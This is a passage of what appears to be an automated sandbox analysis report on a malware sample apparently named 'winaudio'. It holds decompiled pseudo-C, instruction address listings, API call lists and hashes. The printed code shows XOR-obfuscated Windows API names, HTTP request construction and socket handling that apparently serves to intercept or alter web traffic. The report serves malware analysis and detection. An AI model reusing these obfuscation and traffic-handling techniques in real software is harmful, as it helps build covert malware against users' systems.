														 *(_t729 + 0x14) = 0xf;
														__eflags =  *(_t729 + 0x14) - 0x10;
														 *(_t729 + 0x10) = 0;
														if( *(_t729 + 0x14) < 0x10) {
															_t575 = _t729;
														} else {
															_t575 =  *_t729;
														}
														_push(0xffffffff);
														 *_t575 = 0;
														_push(0);
														E002D0960(_t613, _t729,  &_v96);
														_t821 = _t820 - 0x18;
														_v8 = 0xb;
														_t751 = _t821;
														_v204 = _t821;
														 *(_t751 + 0x10) = 0;
														 *(_t751 + 0x14) = 0;
														 *(_t751 + 0x14) = 0xf;
														__eflags =  *(_t751 + 0x14) - 0x10;
														 *(_t751 + 0x10) = 0;
														if( *(_t751 + 0x14) < 0x10) {
															_t578 = _t751;
														} else {
															_t578 =  *_t751;
														}
														 *_t578 = 0;
														__eflags =  *((char*)(" HTTP"));
														if( *((char*)(" HTTP")) != 0) {
															_t730 = " HTTP";
															_t772 = _t730 + 1;
															do {
																_t579 =  *_t730;
																_t730 = _t730 + 1;
																__eflags = _t579;
															} while (_t579 != 0);
															_t731 = _t730 - _t772;
															__eflags = _t731;
															goto L76;
														} else {
															_t731 = 0;
															L76:
															_push(_t731);
															E002D0860(_t613, _t751, " HTTP");
															_t822 = _t821 - 0x18;
															_v8 = 0xc;
															_t752 = _t822;
															 *(_t752 + 0x10) = 0;
															 *(_t752 + 0x14) = 0;
															 *(_t752 + 0x14) = 0xf;
															__eflags =  *(_t752 + 0x14) - 0x10;
															 *(_t752 + 0x10) = 0;
															if( *(_t752 + 0x14) < 0x10) {
																_t581 = _t752;
															} else {
																_t581 =  *_t752;
															}
															 *_t581 = 0;
															__eflags =  *((char*)("POST "));
															if( *((char*)("POST ")) != 0) {
																_t733 = "POST ";
																_t772 = _t733 + 1;
																do {
																	_t582 =  *_t733;
																	_t733 = _t733 + 1;
																	__eflags = _t582;
																} while (_t582 != 0);
																_t734 = _t733 - _t772;
																__eflags = _t734;
																goto L84;
															} else {
																_t734 = 0;
																L84:
																_push(_t734);
																E002D0860(_t613, _t752, "POST ");
																_v8 = 7;
																E002CFE90(_t613,  &_v48, _t755, _t755);
																_t800 = _t822 + 0x48;
																goto L85;
															}
														}
													}
												}
											}
										} else {
											GetLastError();
											L33:
											E002D0420(_t613,  &_v72, _t755);
											E002D0420(_t613,  &_v96, _t755);
											E002D0420(_t613,  &_v168, _t755);
											E002D0420(_t613,  &_v192, _t755);
											E002D0420(_t613,  &_v48, _t755);
											_t367 = _v212;
											_t756 = 0;
											_t763 = 0;
											goto L229;
										}
									}
								} else {
									GetLastError();
									E002D0420(_t613,  &_v48, _t755);
									_t367 = _v212;
									_t756 = 0;
									_t763 = 0;
									goto L229;
								}
							}
							E002E5CB0(E00380F79(1));
							E00351BB0(_t613, _t766);
							GetLastError();
							_t367 = _v212;
							_t756 = 0;
							_t763 = 0;
							goto L229;
						}
						goto L8;
					}
					_t766 = 1;
					goto L11;
				}
				goto L3;
			}
























































































































































































































































                        0x002d3c00
                        0x002d3c03
                        0x002d3c05
                        0x002d3c10
                        0x002d3c11
                        0x002d3c17
                        0x002d3c1c
                        0x002d3c1e
                        0x002d3c21
                        0x002d3c22
                        0x002d3c23
                        0x002d3c24
                        0x002d3c28
                        0x002d3c2e
                        0x002d3c33
                        0x002d3c39
                        0x002d3c3f
                        0x002d3c49
                        0x002d3c53
                        0x002d3c5d
                        0x002d3c67
                        0x002d3c71
                        0x002d3c78
                        0x002d3c7d
                        0x002d3c84
                        0x002d3c8a
                        0x002d3c92
                        0x002d3c95
                        0x002d3ca2
                        0x002d3cb2
                        0x002d3cb4
                        0x002d3cb9
                        0x002d3ceb
                        0x002d3ced
                        0x002d3cf3
                        0x002d3cf9
                        0x002d3cff
                        0x002d3d01
                        0x002d3d07
                        0x002d4c72
                        0x002d4c72
                        0x002d4c7b
                        0x002d4d29
                        0x002d4d2c
                        0x002d4d35
                        0x002d4d44
                        0x002d4d44
                        0x002d4c85
                        0x002d4cb1
                        0x002d4cb1
                        0x002d4cb7
                        0x002d4cb7
                        0x002d4cc0
                        0x002d4cc3
                        0x002d4ccd
                        0x002d4ccd
                        0x002d4ccf
                        0x002d4cde
                        0x002d4ce1
                        0x002d4cee
                        0x002d4cf5
                        0x002d4cf9
                        0x002d4cf9
                        0x002d4d00
                        0x002d4d04
                        0x002d4d04
                        0x002d4d09
                        0x002d4d11
                        0x002d4d17
                        0x002d4d17
                        0x002d4d19
                        0x002d4d21
                        0x002d4d27
                        0x002d4d27
                        0x00000000
                        0x002d4d21
                        0x002d4c87
                        0x002d4c8d
                        0x00000000
                        0x00000000
                        0x002d4c8f
                        0x002d4c96
                        0x002d4ca0
                        0x002d4ca8
                        0x00000000
                        0x002d4ca8
                        0x002d3cc0
                        0x002d3cc6
                        0x002d3cca
                        0x002d3ccf
                        0x002d3cd4
                        0x00000000
                        0x00000000
                        0x002d3cdc
                        0x002d3cde
                        0x002d3ce1
                        0x002d3ce9
                        0x002d3d16
                        0x002d3d1b
                        0x002d3d28
                        0x002d3d2e
                        0x002d3d3b
                        0x002d3d40
                        0x002d3d43
                        0x002d3d44
                        0x002d3d49
                        0x002d3d4c
                        0x002d3d4f
                        0x00000000
                        0x00000000
                        0x002d3d54
                        0x002d3d59
                        0x002d3d5c
                        0x002d3d5f
                        0x002d3d66
                        0x002d3d66
                        0x002d3d6d
                        0x002d3d70
                        0x002d3d75
                        0x002d3d78
                        0x002d3d85
                        0x00000000
                        0x002d3d85
                        0x002d3d61
                        0x002d3d64
                        0x002d3d8c
                        0x002d3d96
                        0x002d3da0
                        0x002d3da0
                        0x002d3da9
                        0x002d3dae
                        0x002d3db1
                        0x002d3db7
                        0x002d3dbc
                        0x002d3dbf
                        0x002d3dc4
                        0x002d3dc7
                        0x002d3dd4
                        0x002d3dd9
                        0x002d3ddb
                        0x002d3e0f
                        0x002d3e13
                        0x002d3e18
                        0x002d3e1b
                        0x002d3e1e
                        0x002d3e23
                        0x002d3e26
                        0x002d3e33
                        0x002d3e38
                        0x002d3e3a
                        0x002d3e3c
                        0x002d3e3d
                        0x002d3e47
                        0x002d3e4e
                        0x002d3e56
                        0x002d3e60
                        0x002d3e62
                        0x002d3e6d
                        0x002d3e74
                        0x002d3e79
                        0x002d3e80
                        0x002d3e83
                        0x002d3e89
                        0x002d3e8c
                        0x002d3e94
                        0x002d3e94
                        0x002d3e99
                        0x002d3e9e
                        0x002d3ea3
                        0x002d3ea3
                        0x002d3ea6
                        0x002d3eab
                        0x002d3eb0
                        0x002d3eb4
                        0x002d3eb8
                        0x002d3ed7
                        0x002d3eda
                        0x002d3edc
                        0x002d3ee2
                        0x002d3ee9
                        0x002d3ef0
                        0x002d3ef7
                        0x002d3efb
                        0x002d3f02
                        0x002d3f08
                        0x002d3f04
                        0x002d3f04
                        0x002d3f04
                        0x002d3f0a
                        0x002d3f0d
                        0x002d3f14
                        0x002d3f1a
                        0x002d3f1f
                        0x002d3f22
                        0x002d3f22
                        0x002d3f24
                        0x002d3f25
                        0x002d3f25
                        0x002d3f29
                        0x002d3f29
                        0x00000000
                        0x002d3f16
                        0x002d3f16
                        0x002d3f2b
                        0x002d3f2b
                        0x002d3f33
                        0x002d3f38
                        0x002d3f3b
                        0x002d3f3f
                        0x002d3f41
                        0x002d3f48
                        0x002d3f4f
                        0x002d3f56
                        0x002d3f5a
                        0x002d3f61
                        0x002d3f67
                        0x002d3f63
                        0x002d3f63
                        0x002d3f63
                        0x002d3f69
                        0x002d3f6b
                        0x002d3f71
                        0x002d3f74
                        0x002d3f7f
                        0x002d3f83
                        0x002d3f8b
                        0x002d3f8e
                        0x002d3f92
                        0x002d3f94
                        0x002d3f9b
                        0x002d3fa2
                        0x002d3fa9
                        0x002d3fad
                        0x002d3fb4
                        0x002d3fba
                        0x002d3fb6
                        0x002d3fb6
                        0x002d3fb6
                        0x002d3fbc
                        0x002d3fbe
                        0x002d3fc7
                        0x002d3fca
                        0x002d3fd5
                        0x002d3fda
                        0x002d3fdd
                        0x002d3fe4
                        0x002d3feb
                        0x002d3fef
                        0x002d3ff6
                        0x002d3ffd
                        0x002d4001
                        0x002d4004
                        0x002d400e
                        0x002d4013
                        0x002d401a
                        0x002d405f
                        0x002d4066
                        0x002d4069
                        0x002d406e
                        0x002d4071
                        0x002d4074
                        0x002d4076
                        0x002d407e
                        0x002d4089
                        0x002d408e
                        0x002d4095
                        0x002d409c
                        0x002d40a3
                        0x002d40a7
                        0x002d40ae
                        0x002d40b4
                        0x002d40b0
                        0x002d40b0
                        0x002d40b0
                        0x002d40b6
                        0x002d40b8
                        0x002d40c1
                        0x002d40c4
                        0x002d40c9
                        0x002d40cc
                        0x002d40d0
                        0x002d40d2
                        0x002d40d9
                        0x002d40e0
                        0x002d40e7
                        0x002d40eb
                        0x002d40f2
                        0x002d40f8
                        0x002d40f4
                        0x002d40f4
                        0x002d40f4
                        0x002d40fa
                        0x002d40fd
                        0x002d4104
                        0x002d410a
                        0x002d410f
                        0x002d4112
                        0x002d4112
                        0x002d4114
                        0x002d4115
                        0x002d4115
                        0x002d4119
                        0x002d4119
                        0x00000000
                        0x002d4106
                        0x002d4106
                        0x002d411b
                        0x002d411b
                        0x002d4123
                        0x002d412b
                        0x002d412f
                        0x002d4137
                        0x002d413a
                        0x002d413d
                        0x002d413f
                        0x002d4145
                        0x002d414c
                        0x002d4153
                        0x002d415a
                        0x002d415e
                        0x002d4165
                        0x002d416b
                        0x002d4167
                        0x002d4167
                        0x002d4167
                        0x002d416d
                        0x002d416f
                        0x002d4175
                        0x002d4178
                        0x002d417d
                        0x002d4180
                        0x002d4184
                        0x002d4186
                        0x002d418c
                        0x002d4193
                        0x002d419a
                        0x002d41a1
                        0x002d41a5
                        0x002d41ac
                        0x002d41b2
                        0x002d41ae
                        0x002d41ae
                        0x002d41ae
                        0x002d41b4
                        0x002d41b7
                        0x002d41be
                        0x002d41c4
                        0x002d41c9
                        0x002d41d0
                        0x002d41d0
                        0x002d41d2
                        0x002d41d3
                        0x002d41d3
                        0x002d41d7
                        0x002d41d7
                        0x00000000
                        0x002d41c0
                        0x002d41c0
                        0x002d41d9
                        0x002d41d9
                        0x002d41e1
                        0x002d41e6
                        0x002d41e9
                        0x002d41ed
                        0x002d41ef
                        0x002d41f6
                        0x002d41fd
                        0x002d4204
                        0x002d4208
                        0x002d420f
                        0x002d4215
                        0x002d4211
                        0x002d4211
                        0x002d4211
                        0x002d4217
                        0x002d421a
                        0x002d4221
                        0x002d4227
                        0x002d422c
                        0x002d4230
                        0x002d4230
                        0x002d4232
                        0x002d4233
                        0x002d4233
                        0x002d4237
                        0x002d4237
                        0x00000000
                        0x002d4223
                        0x002d4223
                        0x002d4239
                        0x002d4239
                        0x002d4241
                        0x002d4248
                        0x002d424f
                        0x002d4254
                        0x002d4257
                        0x002d4259
                        0x002d437a
                        0x002d437a
                        0x002d4382
                        0x002d438f
                        0x002d4397
                        0x002d439a
                        0x002d439e
                        0x002d43a0
                        0x002d43a6
                        0x002d43ad
                        0x002d43b4
                        0x002d43bb
                        0x002d43bf
                        0x002d43c6
                        0x002d43cc
                        0x002d43c8
                        0x002d43c8
                        0x002d43c8
                        0x002d43ce
                        0x002d43d1
                        0x002d43d8
                        0x002d43de
                        0x002d43e3
                        0x002d43e6
                        0x002d43e6
                        0x002d43e8
                        0x002d43e9
                        0x002d43e9
                        0x002d43ed
                        0x002d43ed
                        0x00000000
                        0x002d43da
                        0x002d43da
                        0x002d43ef
                        0x002d43ef
                        0x002d43f7
                        0x002d43fc
                        0x002d43ff
                        0x002d4403
                        0x002d4405
                        0x002d440c
                        0x002d4413
                        0x002d441a
                        0x002d441e
                        0x002d4425
                        0x002d442b
                        0x002d4427
                        0x002d4427
                        0x002d4427
                        0x002d442d
                        0x002d4430
                        0x002d4437
                        0x002d443d
                        0x002d4442
                        0x002d4445
                        0x002d4445
                        0x002d4447
                        0x002d4448
                        0x002d4448
                        0x002d444c
                        0x002d444c
                        0x00000000
                        0x002d4439
                        0x002d4439
                        0x002d444e
                        0x002d444e
                        0x002d4456
                        0x002d445e
                        0x002d4462
                        0x002d446a
                        0x002d446d
                        0x002d446f
                        0x002d4475
                        0x002d447c
                        0x002d4483
                        0x002d448a
                        0x002d448e
                        0x002d4495
                        0x002d449b
                        0x002d4497
                        0x002d4497
                        0x002d4497
                        0x002d449d
                        0x002d44a0
                        0x002d44a7
                        0x002d44ad
                        0x002d44b2
                        0x002d44b5
                        0x002d44b5
                        0x002d44b7
                        0x002d44b8
                        0x002d44b8
                        0x002d44bc
                        0x002d44bc
                        0x00000000
                        0x002d44a9
                        0x002d44a9
                        0x002d44be
                        0x002d44be
                        0x002d44c6
                        0x002d44cb
                        0x002d44ce
                        0x002d44d2
                        0x002d44d4
                        0x002d44db
                        0x002d44e2
                        0x002d44e9
                        0x002d44ed
                        0x002d44f4
                        0x002d44fa
                        0x002d44f6
                        0x002d44f6
                        0x002d44f6
                        0x002d44fc
                        0x002d44fe
                        0x002d4504
                        0x002d4507
                        0x002d450f
                        0x002d4513
                        0x002d451b
                        0x002d451e
                        0x002d4522
                        0x002d4524
                        0x002d452e
                        0x002d4535
                        0x002d453c
                        0x002d4543
                        0x002d4547
                        0x002d454e
                        0x002d4554
                        0x002d4550
                        0x002d4550
                        0x002d4550
                        0x002d4556
                        0x002d4558
                        0x002d455e
                        0x002d4561
                        0x002d456c
                        0x002d4571
                        0x002d4574
                        0x002d4578
                        0x002d457c
                        0x002d459c
                        0x002d459f
                        0x002d45a1
                        0x002d45a8
                        0x002d45af
                        0x002d45b6
                        0x002d45ba
                        0x002d45c1
                        0x002d45c7
                        0x002d45c3
                        0x002d45c3
                        0x002d45c3
                        0x002d45c9
                        0x002d45cb
                        0x002d45d1
                        0x002d45d4
                        0x002d45d9
                        0x002d45e3
                        0x002d45e8
                        0x002d45eb
                        0x002d45ee
                        0x002d45f1
                        0x002d45f6
                        0x002d45ff
                        0x002d460c
                        0x002d4610
                        0x002d4615
                        0x002d4621
                        0x002d4623
                        0x002d4629
                        0x002d462c
                        0x00000000
                        0x002d4632
                        0x002d4632
                        0x002d4639
                        0x002d4643
                        0x002d4648
                        0x002d464b
                        0x002d464d
                        0x002d465f
                        0x002d4661
                        0x002d4664
                        0x002d466a
                        0x002d466c
                        0x002d467e
                        0x002d4683
                        0x002d4686
                        0x002d4688
                        0x002d46bb
                        0x002d46bb
                        0x002d46c1
                        0x002d46c7
                        0x002d46c9
                        0x002d4727
                        0x002d472d
                        0x002d4732
                        0x002d4735
                        0x002d4738
                        0x00000000
                        0x00000000
                        0x002d473a
                        0x002d4745
                        0x002d474a
                        0x002d474f
                        0x002d4754
                        0x002d4761
                        0x002d4765
                        0x002d476a
                        0x002d476e
                        0x002d4773
                        0x002d4776
                        0x002d4778
                        0x002d46d1
                        0x002d46d7
                        0x002d46df
                        0x002d46e7
                        0x002d46ef
                        0x002d46fa
                        0x002d4705
                        0x002d470d
                        0x002d4712
                        0x002d4718
                        0x002d471a
                        0x00000000
                        0x002d471a
                        0x002d4780
                        0x002d4785
                        0x002d4788
                        0x002d4797
                        0x002d479c
                        0x002d47a2
                        0x002d47a4
                        0x00000000
                        0x00000000
                        0x002d47aa
                        0x002d47b6
                        0x002d47c0
                        0x002d47ca
                        0x002d47d0
                        0x002d47d5
                        0x002d47db
                        0x002d47de
                        0x002d47e8
                        0x002d47ec
                        0x002d4800
                        0x002d4807
                        0x002d480a
                        0x002d480c
                        0x002d4811
                        0x002d4811
                        0x002d481c
                        0x002d481f
                        0x002d4829
                        0x002d482f
                        0x002d4831
                        0x002d4839
                        0x002d483e
                        0x002d4842
                        0x002d484d
                        0x002d4850
                        0x002d4856
                        0x002d4865
                        0x002d486a
                        0x002d4870
                        0x002d4872
                        0x002d48ce
                        0x002d48da
                        0x002d48e4
                        0x002d48ea
                        0x002d48ea
                        0x002d48ef
                        0x002d48f5
                        0x002d48f8
                        0x002d4902
                        0x002d4906
                        0x002d4910
                        0x002d4915
                        0x002d4918
                        0x002d491a
                        0x002d491d
                        0x002d491f
                        0x002d4924
                        0x002d4924
                        0x002d492f
                        0x002d4932
                        0x002d493c
                        0x002d4942
                        0x002d4944
                        0x002d494c
                        0x002d494f
                        0x002d4956
                        0x002d4959
                        0x002d495d
                        0x002d4962
                        0x002d4965
                        0x002d4968
                        0x002d4975
                        0x002d497a
                        0x002d497d
                        0x002d4980
                        0x002d4982
                        0x002d4989
                        0x002d498e
                        0x002d4990
                        0x002d4993
                        0x002d4995
                        0x002d4995
                        0x002d499a
                        0x002d499d
                        0x002d499f
                        0x002d49a1
                        0x002d49a1
                        0x002d49a6
                        0x002d49a8
                        0x002d49ab
                        0x002d49ad
                        0x002d49ad
                        0x002d49b2
                        0x002d49b5
                        0x002d49b7
                        0x002d49b7
                        0x002d49bc
                        0x002d49bc
                        0x002d49bf
                        0x002d49c4
                        0x002d49c4
                        0x002d49c7
                        0x002d49cb
                        0x002d49ce
                        0x002d49d5
                        0x002d49dc
                        0x002d49e3
                        0x002d49e6
                        0x002d49e8
                        0x002d49ec
                        0x002d49f1
                        0x002d49f3
                        0x002d49f6
                        0x002d49f8
                        0x002d49f8
                        0x002d49fd
                        0x002d4a00
                        0x002d4a02
                        0x002d4a04
                        0x002d4a04
                        0x002d4a09
                        0x002d4a0b
                        0x002d4a0e
                        0x002d4a10
                        0x002d4a10
                        0x002d4a15
                        0x002d4a18
                        0x002d4a1a
                        0x002d4a1a
                        0x002d4a1f
                        0x002d4a1f
                        0x002d4a22
                        0x002d4a27
                        0x002d4a27
                        0x002d4a2a
                        0x002d4a2e
                        0x002d4a31
                        0x002d4a38
                        0x002d4a3f
                        0x002d4a43
                        0x002d4a46
                        0x002d4a48
                        0x002d4a4c
                        0x002d4a51
                        0x002d4a53
                        0x002d4a56
                        0x002d4a58
                        0x002d4a58
                        0x002d4a5d
                        0x002d4a60
                        0x002d4a62
                        0x002d4a64
                        0x002d4a64
                        0x002d4a69
                        0x002d4a6b
                        0x002d4a6e
                        0x002d4a70
                        0x002d4a70
                        0x002d4a75
                        0x002d4a78
                        0x002d4a7a
                        0x002d4a7a
                        0x002d4a7f
                        0x002d4a7f
                        0x002d4a82
                        0x002d4a87
                        0x002d4a87
                        0x002d4a8a
                        0x002d4a8e
                        0x002d4a91
                        0x002d4a98
                        0x002d4a9f
                        0x002d4aa3
                        0x002d4aa6
                        0x002d4aa8
                        0x002d4aac
                        0x002d4ab1
                        0x002d4ab3
                        0x002d4ab6
                        0x002d4ab8
                        0x002d4ab8
                        0x002d4abd
                        0x002d4ac0
                        0x002d4ac2
                        0x002d4ac4
                        0x002d4ac4
                        0x002d4ac9
                        0x002d4acb
                        0x002d4ace
                        0x002d4ad0
                        0x002d4ad0
                        0x002d4ad5
                        0x002d4ad8
                        0x002d4ada
                        0x002d4ada
                        0x002d4adf
                        0x002d4adf
                        0x002d4ae2
                        0x002d4ae7
                        0x002d4ae7
                        0x002d4aea
                        0x002d4aee
                        0x002d4af4
                        0x002d4afb
                        0x002d4b02
                        0x002d4b06
                        0x002d4b09
                        0x002d4b0b
                        0x002d4b12
                        0x002d4b17
                        0x002d4b19
                        0x002d4b1c
                        0x002d4b1e
                        0x002d4b1e
                        0x002d4b23
                        0x002d4b26
                        0x002d4b28
                        0x002d4b2a
                        0x002d4b2a
                        0x002d4b2f
                        0x002d4b31
                        0x002d4b34
                        0x002d4b36
                        0x002d4b36
                        0x002d4b3b
                        0x002d4b3e
                        0x002d4b40
                        0x002d4b40
                        0x002d4b45
                        0x002d4b45
                        0x002d4b48
                        0x002d4b4d
                        0x002d4b4d
                        0x002d4b50
                        0x002d4b54
                        0x002d4b5a
                        0x002d4b64
                        0x002d4b6e
                        0x002d4b75
                        0x002d4b78
                        0x002d4b7a
                        0x002d4b81
                        0x002d4b86
                        0x002d4b88
                        0x002d4b8b
                        0x002d4b8d
                        0x002d4b8d
                        0x002d4b92
                        0x002d4b95
                        0x002d4b97
                        0x002d4b99
                        0x002d4b99
                        0x002d4b9e
                        0x002d4ba0
                        0x002d4ba3
                        0x002d4ba5
                        0x002d4ba5
                        0x002d4baa
                        0x002d4bad
                        0x002d4baf
                        0x002d4baf
                        0x002d4bb4
                        0x002d4bb4
                        0x002d4bb7
                        0x002d4bbc
                        0x002d4bbc
                        0x002d4bbf
                        0x002d4bc3
                        0x002d4bc6
                        0x002d4bd0
                        0x002d4bda
                        0x002d4be1
                        0x002d4be4
                        0x002d4be6
                        0x002d4bea
                        0x002d4bef
                        0x002d4bf1
                        0x002d4bf4
                        0x002d4bf6
                        0x002d4bf6
                        0x002d4bfb
                        0x002d4bfe
                        0x002d4c00
                        0x002d4c02
                        0x002d4c02
                        0x002d4c07
                        0x002d4c09
                        0x002d4c0c
                        0x002d4c0e
                        0x002d4c0e
                        0x002d4c13
                        0x002d4c16
                        0x002d4c18
                        0x002d4c18
                        0x002d4c1d
                        0x002d4c1d
                        0x002d4c20
                        0x002d4c25
                        0x002d4c28
                        0x002d4c2e
                        0x002d4c34
                        0x002d4c3a
                        0x002d4c41
                        0x002d4c48
                        0x002d4874
                        0x002d4874
                        0x002d4880
                        0x002d4888
                        0x002d4890
                        0x002d4898
                        0x002d48a3
                        0x002d48ae
                        0x002d48b6
                        0x002d48bb
                        0x002d48c1
                        0x002d48c3
                        0x002d48c3
                        0x00000000
                        0x002d4872
                        0x002d46cb
                        0x002d46cb
                        0x00000000
                        0x002d46cb
                        0x002d4690
                        0x002d4695
                        0x002d4698
                        0x002d469b
                        0x002d46a1
                        0x002d46a3
                        0x002d46a6
                        0x002d46a6
                        0x002d46a8
                        0x002d46a9
                        0x002d46a9
                        0x002d46ad
                        0x002d46ad
                        0x002d46af
                        0x002d46af
                        0x002d46b6
                        0x00000000
                        0x002d46b6
                        0x002d469d
                        0x00000000
                        0x002d469d
                        0x002d466e
                        0x00000000
                        0x002d466e
                        0x002d464f
                        0x002d4651
                        0x00000000
                        0x002d4651
                        0x002d457e
                        0x002d457e
                        0x002d457e
                        0x002d458a
                        0x002d4592
                        0x00000000
                        0x002d4592
                        0x002d457c
                        0x002d44a7
                        0x002d4437
                        0x002d43d8
                        0x002d425f
                        0x002d4262
                        0x002d4265
                        0x002d4267
                        0x002d426d
                        0x002d4274
                        0x002d427b
                        0x002d4282
                        0x002d4286
                        0x002d428d
                        0x002d4293
                        0x002d428f
                        0x002d428f
                        0x002d428f
                        0x002d4295
                        0x002d4297
                        0x002d429d
                        0x002d42a0
                        0x002d42a5
                        0x002d42a8
                        0x002d42ac
                        0x002d42ae
                        0x002d42b4
                        0x002d42bb
                        0x002d42c2
                        0x002d42c9
                        0x002d42cd
                        0x002d42d4
                        0x002d42da
                        0x002d42d6
                        0x002d42d6
                        0x002d42d6
                        0x002d42dc
                        0x002d42df
                        0x002d42e6
                        0x002d42ec
                        0x002d42f1
                        0x002d42f4
                        0x002d42f4
                        0x002d42f6
                        0x002d42f7
                        0x002d42f7
                        0x002d42fb
                        0x002d42fb
                        0x00000000
                        0x002d42e8
                        0x002d42e8
                        0x002d42fd
                        0x002d42fd
                        0x002d4305
                        0x002d430a
                        0x002d430d
                        0x002d4311
                        0x002d4313
                        0x002d431a
                        0x002d4321
                        0x002d4328
                        0x002d432c
                        0x002d4333
                        0x002d4339
                        0x002d4335
                        0x002d4335
                        0x002d4335
                        0x002d433b
                        0x002d433e
                        0x002d4345
                        0x002d434b
                        0x002d4350
                        0x002d4353
                        0x002d4353
                        0x002d4355
                        0x002d4356
                        0x002d4356
                        0x002d435a
                        0x002d435a
                        0x00000000
                        0x002d4347
                        0x002d4347
                        0x002d435c
                        0x002d435c
                        0x002d4364
                        0x002d436b
                        0x002d4372
                        0x002d4377
                        0x00000000
                        0x002d4377
                        0x002d4345
                        0x002d42e6
                        0x002d4221
                        0x002d41be
                        0x002d401c
                        0x002d401c
                        0x002d4022
                        0x002d4025
                        0x002d402d
                        0x002d4038
                        0x002d4043
                        0x002d404b
                        0x002d4050
                        0x002d4056
                        0x002d4058
                        0x00000000
                        0x002d4058
                        0x002d401a
                        0x002d3eba
                        0x002d3eba
                        0x002d3ec3
                        0x002d3ec8
                        0x002d3ece
                        0x002d3ed0
                        0x00000000
                        0x002d3ed0
                        0x002d3eb8
                        0x002d3de5
                        0x002d3dec
                        0x002d3df4
                        0x002d3dfa
                        0x002d3e00
                        0x002d3e02
                        0x00000000
                        0x002d3e02
                        0x00000000
                        0x002d3d64
                        0x002d3d9b
                        0x00000000
                        0x002d3d9b
                        0x00000000

                        APIs
                        • GetLastError.KERNEL32 ref: 002D3CF3
                        • GetLastError.KERNEL32 ref: 002D3DF4
                        • GetLastError.KERNEL32 ref: 002D3EBA
                        • GetLastError.KERNEL32 ref: 002D401C
                        • GetLastError.KERNEL32 ref: 002D457E
                        • GetLastError.KERNEL32 ref: 002D46CB
                        • new.LIBCMT ref: 002D4780
                        • new.LIBCMT ref: 002D4842
                          • Part of subcall function 002D5090: CreateThread.KERNEL32(00000000,00000000,Function_00022270,00000000,00000004,00000008), ref: 002D50FC
                          • Part of subcall function 002D5090: ResumeThread.KERNEL32(?,FFFFFFFF,?,002D479C,00000000,00000000,from client request), ref: 002D5112
                          • Part of subcall function 002D5090: SetThreadPriority.KERNEL32(?,00000001,FFFFFFFF,?,002D479C,00000000,00000000,from client request), ref: 002D515F
                        • GetLastError.KERNEL32(?,?,from server response), ref: 002D4874
                        • closesocket.WS2_32(000000FF), ref: 002D4CA0
                        • closesocket.WS2_32(FFFFFFFF), ref: 002D4CCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorLast$Thread$closesocket$CreatePriorityResume
                        • String ID: HTTP$GET $Host$POST $Referer$from client request$from server response$list<T> too long$www.2345.com
                        • API String ID: 2657198278-2326931864
                        • Opcode ID: ba9a23b12fa39ba2e8c339c85db81b3a70e0dc5f9f7506a9324a03c1db077aa9
                        • Instruction ID: 60377cc833665a64e98fb16ff3f11980ef5ce402395d6a6974887e80ea681f32
                        • Opcode Fuzzy Hash: ba9a23b12fa39ba2e8c339c85db81b3a70e0dc5f9f7506a9324a03c1db077aa9
                        • Instruction Fuzzy Hash: E0B22570D20245CFEB19EF68C8557AEBBB4AF01304F1041AEE409AB392D7B59E95CF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D2860 Relevance: 35.6, Strings: 28, Instructions: 605COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 64%
                        			E002D2860() {
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t132;
				void* _t133;
				void* _t134;
				void* _t135;
				void* _t136;

				if( *0x3f0834 == 0) {
					asm("movups xmm0, [0x3eb518]");
					_t92 = 0x10;
					asm("movaps xmm2, [0x3dd5f0]");
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb518], xmm0");
					do {
						 *(_t92 + "CertCreateCertificateContext") =  *(_t92 + "CertCreateCertificateContext") ^ 0x0000002a;
						_t92 = _t92 + 1;
					} while (_t92 < 0x1c);
					asm("movups xmm0, [0x3eb57c]");
					 *0x3eb534 = 0;
					_t93 = 0x10;
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb57c], xmm0");
					do {
						 *(_t93 + "CertFreeCertificateContext") =  *(_t93 + "CertFreeCertificateContext") ^ 0x0000002a;
						_t93 = _t93 + 1;
					} while (_t93 < 0x1a);
					asm("movups xmm0, [0x3eb538]");
					 *0x3eb596 = 0;
					_t94 = 0x10;
					 *0x3eb558 = 0;
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb538], xmm0");
					asm("movups xmm0, [0x3eb548]");
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb548], xmm0");
					asm("movups xmm0, [0x3eb8f0]");
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb8f0], xmm0");
					asm("o16 nop [eax+eax]");
					do {
						 *(_t94 + "CreateToolhelp32Snapshot") =  *(_t94 + "CreateToolhelp32Snapshot") ^ 0x0000002a;
						_t94 = _t94 + 1;
					} while (_t94 < 0x18);
					 *0x3eb908 = 0;
					_t95 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t95 + "https11.jpg") =  *(_t95 + "https11.jpg") ^ 0x0000002a;
						_t95 = _t95 + 1;
					} while (_t95 < 0xb);
					 *0x3eba7b = 0;
